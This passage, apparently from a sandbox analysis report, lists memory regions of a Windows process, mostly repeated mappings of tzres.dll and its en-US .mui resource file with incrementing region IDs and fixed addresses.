"\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4260 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4261 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4262 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4263 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4264 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4265 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4266 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4267 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4268 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4269 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4270 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4271 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4272 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4273 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4274 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4275 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4276 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4277 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4278 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4279 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4280 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4281 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4282 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4283 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4284 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4285 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4286 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4287 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4288 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4289 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4290 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4291 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4292 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4293 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4294 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4295 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4296 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4297 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4298 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4299 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4300 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4301 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4302 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4303 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4304 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4305 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4306 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4307 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4308 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4309 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4310 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4311 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4312 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4313 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4314 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4315 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4316 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4317 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4318 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4319 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4320 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4321 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4322 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4323 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4324 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4325 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4326 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4327 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4328 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4329 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4330 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4331 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4332 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4333 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4334 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4335 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4336 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4337 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4338 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4339 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4340 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4341 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4342 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4343 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4344 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4345 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4346 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4347 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4348 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4349 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4350 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4351 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4352 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4353 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4354 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4355 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4356 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4357 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4358 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4359 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4360 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4361 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4362 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4363 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4364 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4365 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4366 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4367 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4368 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4369 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4370 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4371 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4372 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4373 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4374 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4375 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4376 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4377 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4378 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4379 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4380 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") 